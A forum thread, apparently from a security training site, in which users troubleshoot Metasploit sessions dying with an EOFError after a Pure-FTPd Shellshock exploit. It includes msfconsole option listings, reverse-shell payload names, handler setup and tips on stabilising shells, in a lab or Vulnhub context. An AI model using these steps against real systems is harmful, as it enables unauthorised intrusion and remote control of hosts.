Ready to Start Your Career?

Shell And Meterpreter

Author's profile image

January 1, 2016

Hello all, I have compromised a test setup with MSF. I can open a SHELL but am not able to open a meterpreter, anyone know what I am missing. I launched the exploit by hand, target was vulnerable and is compromised. Thanks Did you set meterpreter as the payload? If so, what is the error? I will copy the error as soon as I am back to work, at home I don't have acces to the server. In geeneral to make this work: Make sure to generate a meterpreter payload (ie windows/meterpreter/reverse\_tcp for windows) Start a listener in msfconsole: exploit/multi/handler Set the same payload in the handler as in the exploit. Run the handler first, then fire the exploit. Good luck. Thanks,I forgot to run the handler before the exploit. Makes sense... Cool that you got it working! :D Now I get this strange error ..... Reason: Died from EOFError ..... H E L P please msf exploit(pureftpd\_bash\_env\_exec) > exploit -j \[\*\] Exploit running as background job. \[\*\] Started bind handler msf exploit(pureftpd\_bash\_env\_exec) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 shell -> msf exploit(pureftpd\_bash\_env\_exec) > sessions -i 1 \[\*\] Starting interaction with 1... \[\*\] - Command shell session 1 closed. Reason: Died from EOFError Can you post your Show options output? Redact any Internet-facing IPs, of course. I can, I will rerun the procedure. The RHOST number above is of course not real, I replaced it because with a fake one. use exploit/multi/ftp/pureftpd\_bash\_env\_exec msf exploit(pureftpd\_bash\_env\_exec) > set TARGET 1 TARGET => 1 msf exploit(pureftpd\_bash\_env\_exec) > set PAYLOAD generic/shell\_reverse\_tcp PAYLOAD => generic/shell\_reverse\_tcp msf exploit(pureftpd\_bash\_env\_exec) > set LHOST LHOST => This answer I found myself but it doesn't help me even a bit: EOFError (End of File error), is thrown when you trying to do carry out an operation on a file object that has already referencing to the end of the file. In this example, we are trying to readline when the line doesn't exist. msf exploit(pureftpd\_bash\_env\_exec) > set LPORT 17149 LPORT => 17149 msf exploit(pureftpd\_bash\_env\_exec) > set SSLVersion TLS1 SSLVersion => TLS1 msf exploit(pureftpd\_bash\_env\_exec) > set RPORT 21 RPORT => 21 msf exploit(pureftpd\_bash\_env\_exec) > set SSLVerifyMode PEER SSLVerifyMode => PEER msf exploit(pureftpd\_bash\_env\_exec) > set VERBOSE 0 VERBOSE => 0 msf exploit(pureftpd\_bash\_env\_exec) > set WfsDelay 0 WfsDelay => 0 msf exploit(pureftpd\_bash\_env\_exec) > set SSL 0 SSL => 0 msf exploit(pureftpd\_bash\_env\_exec) > set ConnectTimeout 10 ConnectTimeout => 10 msf exploit(pureftpd\_bash\_env\_exec) > set TCP::send\_delay 0 TCP::send\_delay => 0 msf exploit(pureftpd\_bash\_env\_exec) > set EnableContextEncoding 0 EnableContextEncoding => 0 msf exploit(pureftpd\_bash\_env\_exec) > set FTPDEBUG 0 FTPDEBUG => 0 msf exploit(pureftpd\_bash\_env\_exec) > set DisablePayloadHandler 0 DisablePayloadHandler => 0 msf exploit(pureftpd\_bash\_env\_exec) > set FTPTimeout 16 FTPTimeout => 16 msf exploit(pureftpd\_bash\_env\_exec) > set TCP::max\_send\_size 0 TCP::max\_send\_size => 0 msf exploit(pureftpd\_bash\_env\_exec) > set RHOST RHOST => msf exploit(pureftpd\_bash\_env\_exec) > set CMDSTAGER::FLAVOR auto CMDSTAGER::FLAVOR => auto msf exploit(pureftpd\_bash\_env\_exec) > set RPATH /bin RPATH => /bin msf exploit(pureftpd\_bash\_env\_exec) > exploit -j \[\*\] Exploit running as background job. \[\*\] Started reverse handler on Nothing is obvious from your output. I haven't seen that error before but that doesn't mean much. : ) Are you sure the exploit is valid against that host? I would probably just enumerate more and try another attack vector. If there aren't any then I would probably go through the exploit code and see if I could do it by hand. That way you might be able to see why it is throwing an error and where. Thanks for your reponse, The exploit is valid against the host, it opens a shell but only for 30 seconds. If I type the command to the list the sessions I can see that a session is open. This wouldn't be the case if the target wasn't compromised. I haven't figured it out yet, but I will. I am going for the admin account. Thanks agian I found that some shells and some exploits don't really work well together. In your output above you use generic/shell\_reverse\_tcp. Maybe give linux/x86/shell\_reverse\_tcp a try in stead. I've been more successful with that one... Hi, You should upload an exe payload to the server and run it in order to open a more stable reverse shell. I get exactly the same problem with Brainspan 1 (on Vulnhub) last week. I've found the shell is more stable if I used a non meterpreter reverse shell but a standart one. Using an executable to setup a reverse meterpreter shell is not always an option... As an alternative, when using meterpreter you could try to do a migration to another process as well. That also often helps a lot. However, looking at the provided options Zjelco is not using Meterpreter, but a standard reverse shell: generic/shell\_reverse\_tcp. Hmm, tough one. I am not sure what set FTPTimeout 16 is but you could play with that. You could tcpdump the entire exploit and see if there is anything obvious in the pcap. Any idea if the ftp server is dying? Have you looked if it has advanced options? Hello guys, Uploading a file isn't an option yet. I do agree with the both of you and will try to use another maybe more stable reverse\_shell. Thanks, and I keep you posted couple of years late, but have you tried setting the handler via netcat, worked for me on a similar case and that solved it.
Schedule Demo